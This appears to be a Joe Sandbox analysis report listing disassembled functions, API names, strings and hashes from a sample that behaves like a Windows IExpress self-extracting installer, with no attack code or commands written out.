                                                                    • Opcode Fuzzy Hash: 8031d0f5c260d1828ae3b026181698a0ded8a6d20b8c433cb7d87d6f329fc285
                                                                    • Instruction Fuzzy Hash: 9351AFB2E15B8486FB519B25E8047E9E790A758BB4F041239DE5917BDDEE38CB83C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB62448 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                    • API String ID: 2659952014-2428544900
                                                                    • Opcode ID: 8b8c07e85b9783fddf8189e616ff50c24e5f390df1e20b01a64ea08d369b5e4a
                                                                    • Instruction ID: 25d6a73587cf75c8eaf8a6bc9fc7ea353b7834243b3c3a8c13b8c2e66b3e31a4
                                                                    • Opcode Fuzzy Hash: 8b8c07e85b9783fddf8189e616ff50c24e5f390df1e20b01a64ea08d369b5e4a
                                                                    • Instruction Fuzzy Hash: 724171B271468086FF209F15E8643DAE7A1F785BA4F545039EA8A07B9CDF3CC646CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB63D0C Relevance: 13.6, APIs: 6, Strings: 3, Instructions: 70memorystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64CE8
                                                                      • Part of subcall function 000000013FB64CC0: SizeofResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64CF3
                                                                      • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64D13
                                                                      • Part of subcall function 000000013FB64CC0: LoadResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D1E
                                                                      • Part of subcall function 000000013FB64CC0: LockResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D27
                                                                      • Part of subcall function 000000013FB64CC0: memcpy_s.MSVCRT ref: 000000013FB64D40
                                                                      • Part of subcall function 000000013FB64CC0: FreeResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D49
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,000000013FB62E75), ref: 000000013FB63D2D
                                                                    • GetLastError.KERNEL32 ref: 000000013FB63D5D
                                                                    • LocalFree.KERNEL32 ref: 000000013FB63DB9
                                                                      • Part of subcall function 000000013FB64A70: LoadStringA.USER32 ref: 000000013FB64B04
                                                                      • Part of subcall function 000000013FB64A70: MessageBoxA.USER32 ref: 000000013FB64B3E
                                                                    • lstrcmpA.KERNEL32(?,?,?,?,?,000000013FB62E75), ref: 000000013FB63DD9
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,000000013FB62E75), ref: 000000013FB63E2E
                                                                      • Part of subcall function 000000013FB67304: FindResourceA.KERNEL32 ref: 000000013FB6732E
                                                                      • Part of subcall function 000000013FB67304: LoadResource.KERNEL32 ref: 000000013FB6733F
                                                                      • Part of subcall function 000000013FB67304: DialogBoxIndirectParamA.USER32 ref: 000000013FB6736F
                                                                      • Part of subcall function 000000013FB67304: FreeResource.KERNEL32 ref: 000000013FB6737B
                                                                    • LocalFree.KERNEL32 ref: 000000013FB63E0D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                    • String ID: <None>$LICENSE$p}'
                                                                    • API String ID: 2414642746-2429390302
                                                                    • Opcode ID: 5a4247ff5b5a3f3e33d9449045396edb7047108b95579c67965ad8371a5c0a11
                                                                    • Instruction ID: 590051502711443b60b0728a337d3b2265ad5a9192b85080fb5eb6f1b8b49d28
                                                                    • Opcode Fuzzy Hash: 5a4247ff5b5a3f3e33d9449045396edb7047108b95579c67965ad8371a5c0a11
                                                                    • Instruction Fuzzy Hash: 48314FF2E1560183F7209F61E8657E6F2A0F7887A8F14413DD94A46AA8DF7DC607CB14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB676D8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                    • API String ID: 3346862599-1109908249
                                                                    • Opcode ID: 0ef2e49ea2d523cb0d96e1510a882bc26b5037e292a8015958692e0b2fe72ee1
                                                                    • Instruction ID: f3923563ba619a298b1835c5e17ba6ad09ca1e54ea0871fcefe0e1fc393d27ee
                                                                    • Opcode Fuzzy Hash: 0ef2e49ea2d523cb0d96e1510a882bc26b5037e292a8015958692e0b2fe72ee1
                                                                    • Instruction Fuzzy Hash: D64181B3F01A9087EB508B25E8807D9F7A5F384B64F65513ADA590379CDF78CA46CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB611C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63librarymemoryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                    • API String ID: 4204503880-1888249752
                                                                    • Opcode ID: 64d96d54a73524583d87b63dfc7e8286ae492dfacb74392b1afb45792a249c94
                                                                    • Instruction ID: 9803ef39b5589e243e8558e1da356cad093dbfa9df7af7d4935c55b89ebb2863
                                                                    • Opcode Fuzzy Hash: 64d96d54a73524583d87b63dfc7e8286ae492dfacb74392b1afb45792a249c94
                                                                    • Instruction Fuzzy Hash: DE210CB6A04B4496EB50DF16F45439AF7A0F788BA4F54452DEE8D43B18DF38D646CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB62628 Relevance: 12.1, APIs: 8, Instructions: 145memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                    • String ID:
                                                                    • API String ID: 1051330783-0
                                                                    • Opcode ID: f78638de83485bf910632d144a3a72b8691c3b3d70d5a8fe4b5d167855251055
                                                                    • Instruction ID: 01653a496246ad048296650fd1df0909ebe08bc76bf93aab71f6e7e8d3949018
                                                                    • Opcode Fuzzy Hash: f78638de83485bf910632d144a3a72b8691c3b3d70d5a8fe4b5d167855251055
                                                                    • Instruction Fuzzy Hash: 63517CB2B006918AFF108F25D900BE8B7A5F745BA8F144139DE4963798EB3CDE92C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB62830 Relevance: 12.1, APIs: 8, Instructions: 118COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                    • String ID:
                                                                    • API String ID: 975904313-0
                                                                    • Opcode ID: e1d04261d858ece4703b4c937cc3562b4ed0abf51833e14a07d3450d64b04fd3
                                                                    • Instruction ID: 76b8291a4a66a1dca149f88a563387e6a971d5826c42cb5f95664b49be8604cb
                                                                    • Opcode Fuzzy Hash: e1d04261d858ece4703b4c937cc3562b4ed0abf51833e14a07d3450d64b04fd3
                                                                    • Instruction Fuzzy Hash: 6D418EF1E096C441FF629B25E8243E9EB91A799BB4F484139CADA077CDCA2CC647C711
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB64938 Relevance: 10.6, APIs: 7, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CapsDeviceRect$Release
                                                                    • String ID:
                                                                    • API String ID: 2212493051-0
                                                                    • Opcode ID: 82eea2d133a119930696c2a32b8ef5d8a93a9560684ae113d9f716f9eb066404
                                                                    • Instruction ID: eca72bf7be73d55a2bf6a4e33a3dc26ce2d02481b586d5b03fab092f99b7f149
                                                                    • Opcode Fuzzy Hash: 82eea2d133a119930696c2a32b8ef5d8a93a9560684ae113d9f716f9eb066404
                                                                    • Instruction Fuzzy Hash: 60317076B205108AF710CBB6E944BDDBB71B348BA9F585139DE0563B4CCA39D646CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB66FB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                    • String ID: UPDFILE%lu
                                                                    • API String ID: 2922116661-2329316264
                                                                    • Opcode ID: 47e30c68af17bc8e8918541752d0bccbb5525b077b522209f1120021165a2946
                                                                    • Instruction ID: 4ec297a5b0a9a4c1dab8234b13ad713bb0d44b0795bb382370847ef9b83cce76
                                                                    • Opcode Fuzzy Hash: 47e30c68af17bc8e8918541752d0bccbb5525b077b522209f1120021165a2946
                                                                    • Instruction Fuzzy Hash: 10215EB2A04B4083FB509B25E8107DAF7A1EB94FB0F65423A9A69477D9DF3CC646C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB64CC0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                    • String ID:
                                                                    • API String ID: 3370778649-0
                                                                    • Opcode ID: e75314f0317059066ea3fc699c563cfa39b45419fc3ce52d9c4f3efc5764e6ed
                                                                    • Instruction ID: 8d8852f7ca2a521f7deb86b3307507edd47b782c76e4f9ad10efef2e488d82a1
                                                                    • Opcode Fuzzy Hash: e75314f0317059066ea3fc699c563cfa39b45419fc3ce52d9c4f3efc5764e6ed
                                                                    • Instruction Fuzzy Hash: 9A1144B1F05B5082FB186B62E94479EF691A749FE0F04543CDD0A87B9CDE3CCA468700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB620C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                    • String ID: wininit.ini
                                                                    • API String ID: 3273605193-4206010578
                                                                    • Opcode ID: 5199a9086dfdbd995451bbaa83a16fce677e21d30420cf1ce0e7fa2ad61c3104
                                                                    • Instruction ID: 9fc5f62eea4a4646749e06c439db6e3cae9baed92c4b5f7c2cbc05b261f244eb
                                                                    • Opcode Fuzzy Hash: 5199a9086dfdbd995451bbaa83a16fce677e21d30420cf1ce0e7fa2ad61c3104
                                                                    • Instruction Fuzzy Hash: 1F111272B1464093FB249B35E8553DAF3A1F7CC764F5441399A5E876ACDE3CC64ACA00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB63680 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Text$DesktopDialogForegroundItem
                                                                    • String ID: tha
                                                                    • API String ID: 761066910-992520703
                                                                    • Opcode ID: 7b0a0afc9afeab9cd489da0c529037e52088d876d79330b77116ab0ab807e242
                                                                    • Instruction ID: 809d8833c0ef9069e1f881c3a3c96fbfa3c9e9ae988f036505bd463582910d66
                                                                    • Opcode Fuzzy Hash: 7b0a0afc9afeab9cd489da0c529037e52088d876d79330b77116ab0ab807e242
                                                                    • Instruction Fuzzy Hash: E701FBF4E1474086FA695B65E8087F8D691A789BB1F585039C806163ECDF6C8787C621
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB6466C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 52memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64CE8
                                                                      • Part of subcall function 000000013FB64CC0: SizeofResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64CF3
                                                                      • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64D13
                                                                      • Part of subcall function 000000013FB64CC0: LoadResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D1E
                                                                      • Part of subcall function 000000013FB64CC0: LockResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D27
                                                                      • Part of subcall function 000000013FB64CC0: memcpy_s.MSVCRT ref: 000000013FB64D40
                                                                      • Part of subcall function 000000013FB64CC0: FreeResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D49
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,00000000,000000013FB630B1), ref: 000000013FB64695
                                                                    • LocalFree.KERNEL32(?,?,?,?,00000000,000000013FB630B1), ref: 000000013FB64725
                                                                      • Part of subcall function 000000013FB64A70: LoadStringA.USER32 ref: 000000013FB64B04
                                                                      • Part of subcall function 000000013FB64A70: MessageBoxA.USER32 ref: 000000013FB64B3E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                    • String ID: <None>$@$FINISHMSG
                                                                    • API String ID: 3507850446-4126004490
                                                                    • Opcode ID: b487ec9568ec1de5c4182c7751c6796abb55c886bfc8e6d40acc34d304059198
                                                                    • Instruction ID: e77032c977a8f85ee0b74d5f6c9782e6d87d22fed50bd3e71df28ccf7aa689dd
                                                                    • Opcode Fuzzy Hash: b487ec9568ec1de5c4182c7751c6796abb55c886bfc8e6d40acc34d304059198
                                                                    • Instruction Fuzzy Hash: 5711BCF6A14B40C3FB209B21F461BEBE291E7857A8F14513D9A4A46B9CDB3DC6468B04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB6723C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$AttributesFile
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                    • API String ID: 438848745-2651688815
                                                                    • Opcode ID: c2ef53279d37d8f959e672e600895df1c9bb0d2f273fc07fa29ab4de3b678f32
                                                                    • Instruction ID: 1e979bb31ee609cbbc7059197a968ee27e5a55d6aa88d3eec289f2d3ecd12f71
                                                                    • Opcode Fuzzy Hash: c2ef53279d37d8f959e672e600895df1c9bb0d2f273fc07fa29ab4de3b678f32
                                                                    • Instruction Fuzzy Hash: B81142B1A1568596FF619F10E4503D9F3A0F795768F94023AD69D026E9DF2CC70BC700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB61490 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                    • String ID:
                                                                    • API String ID: 1273765764-0
                                                                    • Opcode ID: da4bc00c7ae1d23eecce1492ef476764353cfb85bcf844c9ad0217d8cc464016
                                                                    • Instruction ID: 7a47d22f384e5a592d497d9cc9cbd347a10f0e69d3115a61a5bec97db4e3951c
                                                                    • Opcode Fuzzy Hash: da4bc00c7ae1d23eecce1492ef476764353cfb85bcf844c9ad0217d8cc464016
                                                                    • Instruction Fuzzy Hash: B21170B1E00B8481FA609B65F4583D9E350F788FB4F4402399AAA077DDCE3CC2478B40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB639A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 233windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                    • String ID: tha
                                                                    • API String ID: 2312377310-992520703
                                                                    • Opcode ID: c4e2bbb139771fec0025214002a9c0f5fba9f55d383aab18dc9d0e176869e49b
                                                                    • Instruction ID: 18513c58b01d2b326bec006faef9c7f8cc868746b5d68d2b7da46345dfe407d3
                                                                    • Opcode Fuzzy Hash: c4e2bbb139771fec0025214002a9c0f5fba9f55d383aab18dc9d0e176869e49b
                                                                    • Instruction Fuzzy Hash: D3A1ACF6E102418AFB608F25D4447EAE6A4F7487B4F1D103EE95A8379CD638CA46CB20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB67110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleWrite
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                    • API String ID: 1065093856-552775693
                                                                    • Opcode ID: 2ea8483bcfe6ef949360783779cb8a031befe5a113aea48590acfe97ae481b62
                                                                    • Instruction ID: 9ff877e4734264bc7eb17128548b3c3e33ba6db0aedbd8cf6fe9397eef70f84f
                                                                    • Opcode Fuzzy Hash: 2ea8483bcfe6ef949360783779cb8a031befe5a113aea48590acfe97ae481b62
                                                                    • Instruction Fuzzy Hash: B8318FB271468087EB619F10E8547DAF7A0F7897B8F540239EA9D47698CF7CC60ACB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 000000013FB65814 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
